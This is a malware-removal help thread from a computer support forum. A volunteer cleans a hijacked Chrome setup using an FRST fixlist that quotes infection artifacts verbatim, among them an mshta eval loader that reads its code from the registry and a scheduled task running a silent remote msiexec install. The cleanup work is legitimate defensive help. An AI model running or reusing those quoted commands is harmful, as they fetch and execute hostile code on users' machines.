Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Trotux Browser Hijacker and "Custom" Google Search redirect infecting Chrome!


  • This topic is locked This topic is locked
33 replies to this topic

#1 stipess

stipess

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 09 March 2017 - 04:07 PM

So I downloaded a program and started installing it and while it was installing, a bunch of random cmd windows opened and closed, billions of chrome pages opened with random website and programs started downloading and running themselves. When I opened task manager, I saw 3 - 5 suspicious programs running that I currently stopped, but I don't know what they do and how to remove them. Currently the visible damage done is the fact that every time I open Chrome, instead of Google page, this one opens - 

 

http://imgur.com/i95uc6A

 

Even after running a Chrome cleanup tool and uninstalling suspicious programs, it's still happening. On top of that, every time I search something, my google search gets redirected to this - 

 

http://imgur.com/Qm4sZH1

 

Some sort of "Custom" google search.

 

I have attached FRST and Addition files.

Attached Files



BC AdBot (Login to Remove)

 


#2 Slurppa

Slurppa

  • Malware Study Hall Senior
  • 656 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:16 PM

Posted 09 March 2017 - 04:29 PM

Hi stipess and
Welcome to the Bleeping Computer! :)
,
My name is Slurppa and I will be handling your log(s) to help you get cleaned up. Please give me some time to look it over and I will get back to you as soon as possible.

 
 
Please familiarize yourself with the following guidelines:
  • Complete all the steps in their given order.
  • Update me about the current state of your computer.
  • If you have any problems or questions please let me know. If your are unsure how to continue please let me know.
  • Do not run any other fixes/programs that I have not instructed.
  • Copy and paste all logs into your post directly unless otherwise instructed. Don't attach logs.
  • Lack of symptoms does not mean the computer is clean. Please stick with me until I give you green light.

Member of the Bleeping Computer A.I.I. early response team!


#3 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 09 March 2017 - 05:52 PM

UPDATE - 

 

I found this on my programs and features - 

http://prntscr.com/ei1ux0

 

When I click uninstall, nothing happens and it stays there.

 

Also, random programs start running in the background ruining performance.



#4 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 10 March 2017 - 10:53 AM

UPDATE - 

 

On start up, random programs were installed with suspicious names.



#5 Slurppa

Slurppa

  • Malware Study Hall Senior
  • 656 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:16 PM

Posted 10 March 2017 - 02:09 PM

Hello stipess,

Sorry for delay. Please follow steps below

Going over your logs I noticed that you have qbittorrent installed
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs as this is by far the most likely reason you were infected!
  • Files that are downloaded from these website are most likely infected, and even though they may appear to be what you wanted, they may infect your computer at the same time! Do not download files from your p2p client and if you do always scan the file with your anti-virus before executing them!
  • Websites that contain links to download are also highly likely to try and infect your computer! Please avoid them as much as possible and if pop-up boxes appear, always try and close them by clicking the cross at the top right of the window or terminating the browser!
  • The best way to eliminate the risk of infection from p2p applications are to avoid these types of web sites and not use any P2P applications.
  • It is pretty much certain that if you continue to use P2P programs, you will get infected again.
I would recommend that you uninstall qbittorrent, however that choice is up to you. If you choose to remove these programs, you can do so via Start > Control Panel > Add/Remove Programs.
If you wish to keep it, please do not use it, and remove all files downloaded from it until your computer is cleaned! After your computer is cleaned, please Practice Safe Internet and always scan downloaded files with an anti-virus before executing to minimize risk!

==================================================

We need to run a fix with FRST:
  • Please copy and paste the fix I have placed in below to a text file and save it to the same location as FRST with name fixlist.txt

    CreateRestorePoint:
    EmptyTemp:
    CloseProcesses:

    HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoc1osCrFj1Wep2VoXMiKYlqJhirBb2BmxJckKvT9ZnbJ1F3S3Ny_mj_9-Hg_W76Iqhmyt-iUOYM8qCCigSs1pd0pZGUg,,
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQBT7kmVQ_IMHjWC_Lda5X1l0VcvTR4sV2_Mpt9TxCO0NR0pTWRtquCPFchNdziNCfFcN7bstFjFVNj2CasPLYp15GMA,,
    HKU\.DEFAULT\Software\Classes\37811d: "C:\Windows\system32\mshta.exe" "javascript:ia06ofqcP="4PXLrX7N";B1J8=new ActiveXObject("WScript.Shell");L7tBm7TBX="q";E8jkX=B1J8.RegRead("HKCU\\software\\wmfrputk\\etnknunoe");rgEO2R7W="jjB";eval(E8jkX);NCFe4Xhs="PV24C";" <===== ATTENTION
    Task: {113A5FB2-E6BC-45E1-A323-63E6C1405B5D} - System32\Tasks\Online Application => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe <==== ATTENTION
    Task: {158F56AC-8DCA-4447-8122-353A62B3606D} - System32\Tasks\Online Application v2 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {77CA69CD-2EC1-4EAD-912D-DEA93BE7F49A} - System32\Tasks\Online Application v2 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {77F34F71-0850-4250-A427-2E2C767E093B} - System32\Tasks\Online Application Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe <==== ATTENTION
    Task: {446758C0-B5C1-4D0E-A81B-61D800835873} - System32\Tasks\Online Application v2 => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {5F098099-AE34-41D7-B91A-B629AAFF4D24} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
    ShellExecuteHooks: No Name - {A3B75268-0389-11E7-BBCC-64006A5CFC23} - C:\Users\stipe\AppData\Roaming\Vuneing\Ritydreversh.dll [144896 2017-03-09] ()
    HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
    2017-03-09 21:04 - 2017-03-09 21:04 - 00093962 _____ C:\Users\stipe\Desktop\cc_20170309_210447.reg
    2017-03-09 20:58 - 2017-03-09 20:58 - 00016848 _____ C:\Windows\System32\Tasks\2564R4525R6298x4556-dll
    2017-03-09 20:50 - 2017-03-09 20:50 - 00003734 _____ C:\Windows\System32\Tasks\{26474B21-8F86-490C-859C-F4966862DDFB}
    2017-03-09 20:49 - 2017-03-09 20:49 - 00016840 _____ C:\Windows\System32\Tasks\2564R4525R6298x4556
    2017-03-09 20:49 - 2017-03-09 20:49 - 00006182 _____ C:\Windows\System32\Tasks\Werbering Configuration
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Vuneing
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Users\stipe\AppData\Roaming\IObit
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Users\stipe\AppData\Local\Qaqisy
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Program Files (x86)\Werbering Configuration
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Program Files (x86)\IObit
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Program Files (x86)\Arucerycerqsh
    2017-03-09 20:48 - 2017-03-09 20:49 - 00005124 _____ C:\Windows\System32\Tasks\Vasagohok
    2017-03-09 20:48 - 2017-03-09 20:48 - 01962408 _____ C:\Users\stipe\Downloads\78682033114.exe
    2017-03-09 20:47 - 2017-03-09 20:48 - 00000000 ____D C:\Users\stipe\AppData\Roaming\gplyra
    2017-03-09 20:46 - 2017-03-09 20:46 - 07288832 _____ C:\Users\stipe\AppData\Roaming\agent.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 01938537 _____ C:\Users\stipe\AppData\Roaming\StrongKayron.bin
    2017-03-09 20:46 - 2017-03-09 20:46 - 01891618 _____ C:\Users\stipe\AppData\Roaming\SingDax.tst
    2017-03-09 20:46 - 2017-03-09 20:46 - 00126464 _____ C:\Users\stipe\AppData\Roaming\noah.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00126464 _____ C:\Users\stipe\AppData\Roaming\lobby.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00072787 _____ C:\Users\stipe\AppData\Roaming\Qvofind.tst
    2017-03-09 20:46 - 2017-03-09 20:46 - 00070752 _____ C:\Users\stipe\AppData\Roaming\Config.xml
    2017-03-09 20:46 - 2017-03-09 20:46 - 00054272 _____ C:\Users\stipe\AppData\Roaming\ApplicationHosting.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00018432 _____ C:\Users\stipe\AppData\Roaming\Main.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00005568 _____ C:\Users\stipe\AppData\Roaming\md.xml
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003722 _____ C:\Windows\System32\Tasks\Online Application Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003716 _____ C:\Windows\System32\Tasks\Online Application Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003708 _____ C:\Windows\System32\Tasks\Traffic Exchange Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003704 _____ C:\Windows\System32\Tasks\Online Application
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003702 _____ C:\Windows\System32\Tasks\Traffic Exchange Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003690 _____ C:\Windows\System32\Tasks\Traffic Exchange
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003314 _____ C:\Windows\System32\Tasks\Online Application Updater
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003294 _____ C:\Windows\System32\Tasks\Traffic Exchange Updater
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003280 _____ C:\Windows\System32\Tasks\Online Application v209 Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003274 _____ C:\Windows\System32\Tasks\Online Application v209 Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003266 _____ C:\Windows\System32\Tasks\Online Application v2 Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003262 _____ C:\Windows\System32\Tasks\Online Application v209
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003260 _____ C:\Windows\System32\Tasks\Online Application v2 Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003256 _____ C:\Windows\System32\Tasks\Traffic Exchange v209 - 3
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003256 _____ C:\Windows\System32\Tasks\Traffic Exchange v209 - 2
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003256 _____ C:\Windows\System32\Tasks\Traffic Exchange v209 - 1
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003248 _____ C:\Windows\System32\Tasks\Online Application v2
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003242 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 3
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003242 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 2
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003242 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 1
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003120 _____ C:\Windows\System32\Tasks\hostTask
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000420 _____ C:\Windows\Tasks\Online Application Updater.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000406 ____H C:\Windows\Tasks\Traffic Exchange Updater.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000374 _____ C:\Windows\Tasks\Online Application v209.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000374 _____ C:\Windows\Tasks\Online Application v209 Guardian.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000374 _____ C:\Windows\Tasks\Online Application v209 Guard.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Traffic Exchange v209 - 3.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Traffic Exchange v209 - 2.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Traffic Exchange v209 - 1.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Online Application v2.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Online Application v2 Guardian.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Online Application v2 Guard.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000354 _____ C:\Windows\Tasks\Traffic Exchange v2 - 3.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000354 _____ C:\Windows\Tasks\Traffic Exchange v2 - 2.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000354 _____ C:\Windows\Tasks\Traffic Exchange v2 - 1.job
    2017-03-09 20:46 - 2017-03-09 20:43 - 01125376 _____ C:\Users\stipe\AppData\Roaming\SingDax.exe
    2017-03-09 20:46 - 2017-03-09 20:43 - 01125376 _____ C:\Users\stipe\AppData\Roaming\Qvofind.exe
    2017-03-09 20:45 - 2017-03-09 20:46 - 00016560 _____ C:\Users\stipe\AppData\Roaming\InstallationConfiguration.xml
    2017-03-09 20:45 - 2017-03-09 20:46 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
    2017-03-09 20:45 - 2017-03-09 20:45 - 00140288 _____ C:\Users\stipe\AppData\Roaming\Installer.dat
    2017-03-09 20:43 - 2017-03-09 20:47 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Microleaves
    Task: {0F2871D3-C709-4A24-9DF2-3BDB54C95277} - System32\Tasks\Vasagohok => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&amp;v=201739 /q
    Task: {2CD1F7D7-D83F-4F07-BDD3-60C9A0B9EEAC} - System32\Tasks\AppDataUpdater => C:\windows\adsvr.exe [2017-02-27] ()
    C:\windows\adsvr.exe
    Task: {367557C9-2816-49FB-AB00-A2B70FAFAAF1} - System32\Tasks\Microsoft\Windows\Media Center\VCore => C:\\ProgramData\\vCore\\VCore.exe [2017-03-06] () <==== ATTENTION
    C:\\ProgramData\\vCore\\VCore.exe
    Task: {75B469B6-CAE1-433E-BD1C-BD4BA0F83125} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
    Task: {78933AC5-3AE2-4CBE-9451-40B222B9CBAB} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {9BCEF8A6-957E-46FD-8158-2FF162A0B12F} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {9F10326A-2137-4302-937A-0F48F673CB3D} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
    Task: {A40A18EE-765B-40F9-9298-1DE7FADEB928} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
    Task: {A8778D09-71DA-4AA9-AF7F-A80FDF8C5B0D} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
    Task: {DC0A9146-CE93-4F00-8A0F-03E3A7B2B61F} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe <==== ATTENTION
    Task: {E709374B-0FF2-43FD-BBE5-1D13DD140736} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
    Task: {F494A980-7C8F-4A41-91DC-A28FDBFAE75B} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
    Task: {C6F0AC99-6A8F-410F-B62D-FB4F010A2309} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
    R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [8061808 2017-01-19] (Reimage®)
    2017-03-06 10:31 - 2017-03-06 10:31 - 00003548 _____ C:\Windows\System32\Tasks\Reimage Reminder
    2017-03-06 10:30 - 2017-03-06 10:30 - 00004352 _____ C:\Windows\System32\Tasks\ReimageUpdater
    2017-03-06 10:30 - 2017-03-06 10:30 - 00001984 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
    2017-03-06 10:31 - 2017-03-06 10:31 - 00003548 _____ C:\Windows\System32\Tasks\Reimage Reminder
    2017-03-06 10:30 - 2017-03-06 10:30 - 00004352 _____ C:\Windows\System32\Tasks\ReimageUpdater
    2017-03-06 10:30 - 2017-03-06 10:30 - 00001984 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
    2017-03-06 10:29 - 2017-03-06 10:31 - 00000140 _____ C:\Windows\Reimage.ini
    2017-03-06 10:29 - 2017-03-06 10:31 - 00000000 ____D C:\rei
    2017-03-06 10:29 - 2017-03-06 10:30 - 00604928 _____ (Reimage) C:\Users\stipe\Downloads\ReimageRepair (1).exe
    2017-03-06 10:29 - 2017-03-06 10:30 - 00000000 ____D C:\Program Files\Reimage
    2017-03-06 10:28 - 2017-03-06 10:29 - 00604928 _____ (Reimage) C:\Users\stipe\Downloads\ReimageRepair.exe
    Task: {7BA5C1C0-E332-47C3-BB3E-4F818863E093} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-01-19] (Reimage®) <==== ATTENTION
    Task: {7D037AAF-B5E0-470A-96DA-4A4207554559} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2016-11-13] (Reimage ltd.) <==== ATTENTION
    HKLM\...\Run: [gplyra] => C:\Users\stipe\AppData\Roaming\gplyra\gplyra\start.cmd [216 2017-01-10] ()
    2017-02-17 09:19 - 2016-12-13 02:47 - 00000000 ____D C:\Users\stipe\Desktop\DriverEasy.Pro.5.1.5.5598
    2017-02-17 08:26 - 2017-02-17 08:50 - 00000438 _____ C:\Windows\Tasks\Driver Easy Scheduled Scan.job
    2017-02-17 08:26 - 2017-02-17 08:26 - 00003912 _____ C:\Windows\System32\Tasks\Driver Easy Scheduled Scan
    2017-02-17 08:26 - 2017-02-17 08:26 - 00001012 _____ C:\Users\Public\Desktop\Driver Easy.lnk
    2017-02-17 08:25 - 2017-02-17 08:26 - 03893424 _____ (Easeware ) C:\Users\stipe\Downloads\DriverEasy_Setup.exe
    Task: {F175CBB6-9AF3-4273-8D77-56CDC1C84E7B} - System32\Tasks\Driver Easy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2017-01-13] (Easeware)
    Task: {F175CBB6-9AF3-4273-8D77-56CDC1C84E7B} - System32\Tasks\Driver Easy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2017-01-13] (Easeware)
    Task: {F175CBB6-9AF3-4273-8D77-56CDC1C84E7B} - System32\Tasks\Driver Easy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2017-01-13] (Easeware)
    Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
    Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
    Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
    FirewallRules: [{EE0F0A74-9FC5-4C80-9518-52A9EBF17A5B}] => (Allow) C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
    FirewallRules: [{EE0F0A74-9FC5-4C80-9518-52A9EBF17A5B}] => (Allow) C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
    C:\Program Files\Easeware
    HKLM-x32\...\Run: [chromebrowser] => C:\Windows\chromebrowser.exe [2751336 2017-03-09] () <===== ATTENTION
    HKLM\...\RunOnce: [DESKTOP-SBND6RH] => C:\Users\stipe\AppData\Local\Temp\g881A.tmp.exe [249344 2017-03-09] () <===== ATTENTION
    HKU\S-1-5-18\...\Run: [] => [X]
    AppInit_DLLs: C:\ProgramData\Hotfresh\Nimlex.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\Hotfresh\Kineco.dll => No File
    S2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [1125376 2017-03-09] () [File not signed]
    S2 PrefersSecure; C:\ProgramData\PrefersSecure\Nettrans.exe [44544 2017-03-02] () [File not signed]
    C:\ProgramData\\CloudPrinter
    C:\ProgramData\PrefersSecure
    2017-03-09 21:04 - 2017-03-09 21:04 - 00093962 _____ C:\Users\stipe\Desktop\cc_20170309_210447.reg
    2017-03-09 20:43 - 2017-03-09 20:43 - 02751336 _____ C:\Windows\chromebrowser.exe
    2017-03-05 16:00 - 2017-03-05 16:00 - 00000000 ____D C:\Users\stipe\AppData\LocalLow\Jujubee S_A_
    2017-03-05 14:33 - 2016-10-04 09:04 - 00000000 ____D C:\Users\stipe\Desktop\Reassembly.v19.09.2016
    2017-03-05 14:24 - 2017-03-05 14:25 - 111180508 _____ C:\Users\stipe\Downloads\Reassembly.v19.09.2016.rar
    2017-02-28 14:07 - 2017-02-28 14:07 - 00053759 _____ C:\Users\stipe\AppData\Roaming\Yoghourt.AooI
    2017-02-28 12:17 - 2017-02-28 12:17 - 00065536 _____ C:\Users\stipe\AppData\Roaming\eightsome.dll
    2017-02-28 09:24 - 2017-03-09 20:47 - 00002398 _____ C:\Windows\SysWOW64\findit.xml
    2017-02-28 09:23 - 2017-03-09 15:25 - 00000000 ____D C:\Users\stipe\AppData\Local\Icsoft
    2017-02-28 09:23 - 2017-03-05 05:18 - 00000000 ____D C:\Users\stipe\AppData\Local\YWPack
    2017-02-27 20:53 - 2017-02-27 20:53 - 00068066 _____ C:\Windows\adsvr.exe
    2017-02-27 20:53 - 2017-02-27 20:53 - 00003422 _____ C:\Windows\System32\Tasks\AppDataUpdater
    2017-02-28 12:17 - 2017-02-28 12:17 - 0065536 _____ () C:\Users\stipe\AppData\Roaming\eightsome.dll
    2017-03-09 20:46 - 2017-03-09 20:43 - 1125376 _____ () C:\Users\stipe\AppData\Roaming\Qvofind.exe
    2017-03-09 20:46 - 2017-03-09 20:46 - 0072787 _____ () C:\Users\stipe\AppData\Roaming\Qvofind.tst
    2017-03-09 20:46 - 2017-03-09 20:43 - 1125376 _____ () C:\Users\stipe\AppData\Roaming\SingDax.exe
    2017-03-09 20:46 - 2017-03-09 20:46 - 1891618 _____ () C:\Users\stipe\AppData\Roaming\SingDax.tst
    2017-03-09 20:46 - 2017-03-09 20:46 - 1938537 _____ () C:\Users\stipe\AppData\Roaming\StrongKayron.bin
    trotux - Uninstall (HKLM-x32\...\{773A4DAA-2970-4728-BF16-43941A803408}) (Version: - ) <==== ATTENTION
    Task: {B40BDFDB-BDCB-471C-B2A8-1F7099EEC70C} - System32\Tasks\2564R4525R6298x4556-dll => Rundll32.exe "C:\ProgramData\2564R4525R6298x4556\2564R4525R6298x4556.dll",Rxlezu
    Task: {837A61E3-8307-4184-A28F-CDEB676D90F0} - System32\Tasks\Werbering Configuration => C:\Program Files (x86)\Arucerycerqsh\xpurecult.exe [2017-03-09] (Glarysoft Ltd)
    Task: {26A7504A-C87F-44F6-9DAC-BB2AEEBFD678} - System32\Tasks\2564R4525R6298x4556 => Rundll32.exe "C:\ProgramData\2564R4525R6298x4556\2564R4525R6298x4556.dll",Rxlezu <==== ATTENTION
    Task: {17AB3858-3715-496B-A763-14D66A9E9A37} - System32\Tasks\hostTask => C:\ProgramData\CloudPrinter\tree.exe [2017-03-09] ()
    C:\ProgramData\2564R4525R6298x4556
    C:\Program Files (x86)\Arucerycerqsh

    Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
Please include FRST Fixlog.txt AND new FRST log and additions log in your next reply.
Since you have already ran FRST once you need to check
Addition.txt checkbox before Scan in order to get addition log file!

Member of the Bleeping Computer A.I.I. early response team!


#6 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 10 March 2017 - 02:37 PM

http://prntscr.com/eidy0s - that popped up on startup

 

However, this program is still running - http://prntscr.com/eie8fa , and when I try to delete it, it says it's being used and can't be removed even if I did end the task in task manager.

Attached Files


Edited by stipess, 10 March 2017 - 02:46 PM.


#7 Slurppa

Slurppa

  • Malware Study Hall Senior
  • 656 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:16 PM

Posted 12 March 2017 - 03:58 AM

Hi stipess

I noticed that you have installed Reasoncore security product. Please refrain from doing system modification while we are working on your issue.

Fix deleted a lot of stuff but apparently there are some new ones now.

Are you using pirated version of techsmith software?
Pirated software and cracks/keygens are known to distribute malware and are therefore harmful to your system and possibly others by spreading the infection.
Bewarned that many of our tools delete pirated software and cracks automatically. We do not help with the usage of pirated software. I will help you clean your computer now since it can spread the infection to other computers.
Please delete any pirated software and cracks/keygens from your computer before continuing.

====================================
:step1:
CKScanner
  • Download CKScanner from here:http://downloads.malwareremoval.com/CKScanner.exe
  • Important - Save it to your desktop.
  • Right Click CKScanner.exe and "Run as administrator".
  • Give permission if necessary, and click Search For Files.
  • After a very short time, when the cursor hourglass disappears, click Save List To File.
  • A message box will verify the file saved. Please run the program once only.
  • Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.
====================================

:step2:
